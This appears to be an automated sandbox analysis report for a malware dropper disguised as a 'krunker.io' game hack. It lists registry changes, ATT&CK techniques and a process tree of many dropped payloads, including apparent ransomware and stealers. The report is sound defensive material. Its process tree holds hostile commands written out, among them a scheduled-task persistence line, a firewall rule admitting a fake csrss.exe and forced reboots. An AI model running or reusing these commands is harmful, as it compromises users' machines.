Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	EXCEL.EXE

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
1620	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

NOTEPAD.EXE

pid	Process
1460	NOTEPAD.EXE

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
2740	PING.EXE

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	5	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid	Process
1272	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

[email protected]TEMPEX~1SrvSrv.exeDesktopLayer.exeDesktopLayerSrv.exebot.exerandom.exe

pid	Process
2676	[email protected]
2676	[email protected]
2352	TEMPEX~1SrvSrv.exe
2352	TEMPEX~1SrvSrv.exe
2352	TEMPEX~1SrvSrv.exe
2352	TEMPEX~1SrvSrv.exe
2472	DesktopLayer.exe
2472	DesktopLayer.exe
2472	DesktopLayer.exe
2472	DesktopLayer.exe
1128	DesktopLayerSrv.exe
1128	DesktopLayerSrv.exe
1128	DesktopLayerSrv.exe
1128	DesktopLayerSrv.exe
2468	bot.exe
2468	bot.exe
2468	bot.exe
2468	bot.exe
2468	bot.exe
2468	bot.exe
2468	bot.exe
2468	bot.exe
2468	bot.exe
2468	bot.exe
2468	bot.exe
2468	bot.exe
2468	bot.exe
2364	random.exe

Suspicious use of AdjustPrivilegeToken 53 IoCs

Processes:

4363463463464363463463463.exe[email protected]bot.exetaskse.exetaskkill.exevssvc.exeWMIC.exeGHHJHJ~1.EXEtaskse.exeghjkl.exe

description	pid	Process
Token: SeDebugPrivilege	2680	4363463463464363463463463.exe
Token: SeShutdownPrivilege	2452	[email protected]
Token: SeDebugPrivilege	2468	bot.exe
Token: SeTcbPrivilege	2732	taskse.exe
Token: SeTcbPrivilege	2732	taskse.exe
Token: SeDebugPrivilege	880	taskkill.exe
Token: SeBackupPrivilege	2940	vssvc.exe
Token: SeRestorePrivilege	2940	vssvc.exe
Token: SeAuditPrivilege	2940	vssvc.exe
Token: SeIncreaseQuotaPrivilege	872	WMIC.exe
Token: SeSecurityPrivilege	872	WMIC.exe
Token: SeTakeOwnershipPrivilege	872	WMIC.exe
Token: SeLoadDriverPrivilege	872	WMIC.exe
Token: SeSystemProfilePrivilege	872	WMIC.exe
Token: SeSystemtimePrivilege	872	WMIC.exe
Token: SeProfSingleProcessPrivilege	872	WMIC.exe
Token: SeIncBasePriorityPrivilege	872	WMIC.exe
Token: SeCreatePagefilePrivilege	872	WMIC.exe
Token: SeBackupPrivilege	872	WMIC.exe
Token: SeRestorePrivilege	872	WMIC.exe
Token: SeShutdownPrivilege	872	WMIC.exe
Token: SeDebugPrivilege	872	WMIC.exe
Token: SeSystemEnvironmentPrivilege	872	WMIC.exe
Token: SeRemoteShutdownPrivilege	872	WMIC.exe
Token: SeUndockPrivilege	872	WMIC.exe
Token: SeManageVolumePrivilege	872	WMIC.exe
Token: 33	872	WMIC.exe
Token: 34	872	WMIC.exe
Token: 35	872	WMIC.exe
Token: SeIncreaseQuotaPrivilege	872	WMIC.exe
Token: SeSecurityPrivilege	872	WMIC.exe
Token: SeTakeOwnershipPrivilege	872	WMIC.exe
Token: SeLoadDriverPrivilege	872	WMIC.exe
Token: SeSystemProfilePrivilege	872	WMIC.exe
Token: SeSystemtimePrivilege	872	WMIC.exe
Token: SeProfSingleProcessPrivilege	872	WMIC.exe
Token: SeIncBasePriorityPrivilege	872	WMIC.exe
Token: SeCreatePagefilePrivilege	872	WMIC.exe
Token: SeBackupPrivilege	872	WMIC.exe
Token: SeRestorePrivilege	872	WMIC.exe
Token: SeShutdownPrivilege	872	WMIC.exe
Token: SeDebugPrivilege	872	WMIC.exe
Token: SeSystemEnvironmentPrivilege	872	WMIC.exe
Token: SeRemoteShutdownPrivilege	872	WMIC.exe
Token: SeUndockPrivilege	872	WMIC.exe
Token: SeManageVolumePrivilege	872	WMIC.exe
Token: 33	872	WMIC.exe
Token: 34	872	WMIC.exe
Token: 35	872	WMIC.exe
Token: SeDebugPrivilege	3016	GHHJHJ~1.EXE
Token: SeTcbPrivilege	4068	taskse.exe
Token: SeTcbPrivilege	4068	taskse.exe
Token: SeDebugPrivilege	3040	ghjkl.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

iexplore.exe

pid	Process
2060	iexplore.exe
2060	iexplore.exe
2060	iexplore.exe
2060	iexplore.exe

Suspicious use of SetWindowsHookEx 36 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEWINWORD.EXEEXCEL.EXE@[email protected]@[email protected]@[email protected]@[email protected]

pid	Process
2060	iexplore.exe
2060	iexplore.exe
3048	IEXPLORE.EXE
3048	IEXPLORE.EXE
3048	IEXPLORE.EXE
3048	IEXPLORE.EXE
2060	iexplore.exe
2060	iexplore.exe
2060	iexplore.exe
2060	iexplore.exe
2060	iexplore.exe
2060	iexplore.exe
2620	IEXPLORE.EXE
2620	IEXPLORE.EXE
2620	IEXPLORE.EXE
2620	IEXPLORE.EXE
2564	IEXPLORE.EXE
2564	IEXPLORE.EXE
1272	WINWORD.EXE
2768	EXCEL.EXE
1272	WINWORD.EXE
1088	@[email protected]
1088	@[email protected]
2848	@[email protected]
2848	@[email protected]
292	@[email protected]
292	@[email protected]
2768	EXCEL.EXE
2768	EXCEL.EXE
2768	EXCEL.EXE
2768	EXCEL.EXE
2768	EXCEL.EXE
2768	EXCEL.EXE
2768	EXCEL.EXE
2768	EXCEL.EXE
4040	@[email protected]

Suspicious use of UnmapMainImage 2 IoCs

Processes:

[email protected][email protected]

pid	Process
2676	[email protected]
2452	[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

krunker.iohacks.execmd.exebot.exeRIP_YOUR_PC_LOL.exe1.exeska2pwej.aeh.exex2s443bc.cs1.exe

description	pid	Process	procid_target
PID 1640 wrote to memory of 2700	1640	krunker.iohacks.exe	28
PID 1640 wrote to memory of 2700	1640	krunker.iohacks.exe	28
PID 1640 wrote to memory of 2700	1640	krunker.iohacks.exe	28
PID 1640 wrote to memory of 2700	1640	krunker.iohacks.exe	28
PID 2700 wrote to memory of 2680	2700	cmd.exe	30
PID 2700 wrote to memory of 2680	2700	cmd.exe	30
PID 2700 wrote to memory of 2680	2700	cmd.exe	30
PID 2700 wrote to memory of 2680	2700	cmd.exe	30
PID 2700 wrote to memory of 2708	2700	cmd.exe	32
PID 2700 wrote to memory of 2708	2700	cmd.exe	32
PID 2700 wrote to memory of 2708	2700	cmd.exe	32
PID 2700 wrote to memory of 2708	2700	cmd.exe	32
PID 2700 wrote to memory of 2452	2700	cmd.exe	33
PID 2700 wrote to memory of 2452	2700	cmd.exe	33
PID 2700 wrote to memory of 2452	2700	cmd.exe	33
PID 2700 wrote to memory of 2452	2700	cmd.exe	33
PID 2700 wrote to memory of 2676	2700	cmd.exe	34
PID 2700 wrote to memory of 2676	2700	cmd.exe	34
PID 2700 wrote to memory of 2676	2700	cmd.exe	34
PID 2700 wrote to memory of 2676	2700	cmd.exe	34
PID 2700 wrote to memory of 2428	2700	cmd.exe	35
PID 2700 wrote to memory of 2428	2700	cmd.exe	35
PID 2700 wrote to memory of 2428	2700	cmd.exe	35
PID 2700 wrote to memory of 2428	2700	cmd.exe	35
PID 2708 wrote to memory of 2468	2708	bot.exe	36
PID 2708 wrote to memory of 2468	2708	bot.exe	36
PID 2708 wrote to memory of 2468	2708	bot.exe	36
PID 2708 wrote to memory of 2468	2708	bot.exe	36
PID 2700 wrote to memory of 2944	2700	cmd.exe	37
PID 2700 wrote to memory of 2944	2700	cmd.exe	37
PID 2700 wrote to memory of 2944	2700	cmd.exe	37
PID 2700 wrote to memory of 2944	2700	cmd.exe	37
PID 2700 wrote to memory of 2524	2700	cmd.exe	38
PID 2700 wrote to memory of 2524	2700	cmd.exe	38
PID 2700 wrote to memory of 2524	2700	cmd.exe	38
PID 2700 wrote to memory of 2524	2700	cmd.exe	38
PID 2700 wrote to memory of 2524	2700	cmd.exe	38
PID 2700 wrote to memory of 2524	2700	cmd.exe	38
PID 2700 wrote to memory of 2524	2700	cmd.exe	38
PID 2944 wrote to memory of 2788	2944	RIP_YOUR_PC_LOL.exe	39
PID 2944 wrote to memory of 2788	2944	RIP_YOUR_PC_LOL.exe	39
PID 2944 wrote to memory of 2788	2944	RIP_YOUR_PC_LOL.exe	39
PID 2944 wrote to memory of 2788	2944	RIP_YOUR_PC_LOL.exe	39
PID 2700 wrote to memory of 1364	2700	cmd.exe	41
PID 2700 wrote to memory of 1364	2700	cmd.exe	41
PID 2700 wrote to memory of 1364	2700	cmd.exe	41
PID 2700 wrote to memory of 1364	2700	cmd.exe	41
PID 2700 wrote to memory of 1364	2700	cmd.exe	41
PID 2700 wrote to memory of 1364	2700	cmd.exe	41
PID 2700 wrote to memory of 1364	2700	cmd.exe	41
PID 2788 wrote to memory of 1572	2788	1.exe	42
PID 2788 wrote to memory of 1572	2788	1.exe	42
PID 2788 wrote to memory of 1572	2788	1.exe	42
PID 2788 wrote to memory of 1572	2788	1.exe	42
PID 2524 wrote to memory of 860	2524	ska2pwej.aeh.exe	43
PID 2524 wrote to memory of 860	2524	ska2pwej.aeh.exe	43
PID 2524 wrote to memory of 860	2524	ska2pwej.aeh.exe	43
PID 2524 wrote to memory of 860	2524	ska2pwej.aeh.exe	43
PID 2524 wrote to memory of 860	2524	ska2pwej.aeh.exe	43
PID 2524 wrote to memory of 860	2524	ska2pwej.aeh.exe	43
PID 2524 wrote to memory of 860	2524	ska2pwej.aeh.exe	43
PID 1364 wrote to memory of 1664	1364	x2s443bc.cs1.exe	45
PID 1364 wrote to memory of 1664	1364	x2s443bc.cs1.exe	45
PID 1364 wrote to memory of 1664	1364	x2s443bc.cs1.exe	45

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid	Process
1780	attrib.exe
2232	attrib.exe
1020	attrib.exe

C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe
"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2700
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
    "4363463463464363463463463.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2680
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GHHJHJ~1.EXE"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      PID:2000
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GHHJHJ~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\GHHJHJ~1.EXE
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3016
      - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:2108
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\random.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      PID:2084
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\random.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\random.exe
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2364
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\555.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      PID:2452
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\555.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\555.exe
        5⤵
        Executes dropped EXE
        
        PID:2828
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjkl.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      PID:1804
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjkl.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ghjkl.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3040
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\PROJEC~1.EXE"
      4⤵
      PID:3896
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\PROJEC~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\PROJEC~1.EXE
        5⤵
        
        PID:3556
      - C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe"
        6⤵
        
        PID:4092
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup8.exe"
      4⤵
      PID:3784
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup8.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup8.exe
        5⤵
        
        PID:4036
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U3440~1.EXE"
        6⤵
        
        PID:3864
        
        C:\Users\Admin\AppData\Local\Temp\U3440~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U3440~1.EXE
        7⤵
        
        PID:1068
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\KJDGDGDHDG.exe"
        8⤵
        
        PID:1040
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\KJDGDGDHDG.exe
        9⤵
        
        PID:512
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GCFCFCGCGI.exe"
        8⤵
        
        PID:4640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\GCFCFCGCGI.exe
        9⤵
        
        PID:3776
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U3441~1.EXE"
        6⤵
        
        PID:3700
        
        C:\Users\Admin\AppData\Local\Temp\U3441~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U3441~1.EXE
        7⤵
        
        PID:232
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SYSTEM~1.EXE" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        8⤵
        
        PID:4592
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SYSTEM~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\iolo\dm\SYSTEM~1.EXE /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        9⤵
        
        PID:4196
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\PRNTSC~1.EXE"
      4⤵
      PID:3624
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\PRNTSC~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\PRNTSC~1.EXE
        5⤵
        
        PID:2840
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\PRNTSC~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\PRNTSC~1.EXE u5
        6⤵
        
        PID:3556
        
        C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        7⤵
        
        PID:3584
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Locker.exe"
      4⤵
      PID:3420
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Locker.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Locker.exe
        5⤵
        
        PID:2792
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumma21.exe"
      4⤵
      PID:1212
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumma21.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumma21.exe
        5⤵
        
        PID:2228
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Windows.exe"
      4⤵
      PID:1232
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Windows.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Windows.exe
        5⤵
        
        PID:1176
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe"
      4⤵
      PID:3908
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe
        5⤵
        
        PID:896
      - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpB471.tmp.bat""
        6⤵
        
        PID:3624
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dusers.exe"
      4⤵
      PID:3272
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dusers.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\dusers.exe
        5⤵
        
        PID:2760
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\move.bat" "
        6⤵
        
        PID:5008
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\D21CBE~1.EXE"
      4⤵
      PID:1920
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\D21CBE~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\D21CBE~1.EXE
        5⤵
        
        PID:4268
      - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\D21CBE~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\D21CBE~1.EXE"
        6⤵
        
        PID:4464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:4276
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        7⤵
        
        PID:5248
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOLZKQ~1.EXE"
      4⤵
      PID:4712
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOLZKQ~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\DOLZKQ~1.EXE
        5⤵
        
        PID:5032
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ama.exe"
      4⤵
      PID:4788
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ama.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ama.exe
        5⤵
        
        PID:4340
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\virus.exe"
      4⤵
      PID:2084
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\virus.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\virus.exe
        5⤵
        
        PID:5096
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\peinf.exe"
      4⤵
      PID:3708
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\peinf.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\peinf.exe
        5⤵
        
        PID:3548
      - C:\Users\Admin\AppData\Local\Temp\71519988.exe
        
        C:\Users\Admin\AppData\Local\Temp\71519988.exe
        6⤵
        
        PID:3880
        
        C:\Users\Admin\AppData\Local\Temp\2145228497.exe
        
        C:\Users\Admin\AppData\Local\Temp\2145228497.exe
        7⤵
        
        PID:1728
        
        C:\Users\Admin\AppData\Local\Temp\168535159.exe
        
        C:\Users\Admin\AppData\Local\Temp\168535159.exe
        8⤵
        
        PID:1300
        
        C:\Users\Admin\AppData\Local\Temp\79703261.exe
        
        C:\Users\Admin\AppData\Local\Temp\79703261.exe
        8⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\674132759.exe
        
        C:\Users\Admin\AppData\Local\Temp\674132759.exe
        8⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\1268714394.exe
        
        C:\Users\Admin\AppData\Local\Temp\1268714394.exe
        8⤵
        
        PID:4804
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c shutdown /r
        9⤵
        
        PID:3640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c shutdown /r
        10⤵
        
        PID:5044
        
        C:\Users\Admin\AppData\Local\Temp\1968033630.exe
        
        C:\Users\Admin\AppData\Local\Temp\1968033630.exe
        7⤵
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\725331762.exe
        
        C:\Users\Admin\AppData\Local\Temp\725331762.exe
        7⤵
        
        PID:4184
        
        C:\Users\Admin\AppData\Local\Temp\730133380.exe
        
        C:\Users\Admin\AppData\Local\Temp\730133380.exe
        7⤵
        
        PID:4332
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c shutdown /r
        8⤵
        
        PID:760
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c shutdown /r
        9⤵
        
        PID:2896
        
        C:\Users\Admin\AppData\Local\Temp\317494507.exe
        
        C:\Users\Admin\AppData\Local\Temp\317494507.exe
        7⤵
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\3314139030.exe
        
        C:\Users\Admin\AppData\Local\Temp\3314139030.exe
        8⤵
        
        PID:2004
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SWIZZY~1.EXE"
      4⤵
      PID:3108
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SWIZZY~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\SWIZZY~1.EXE
        5⤵
        
        PID:1708
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4060
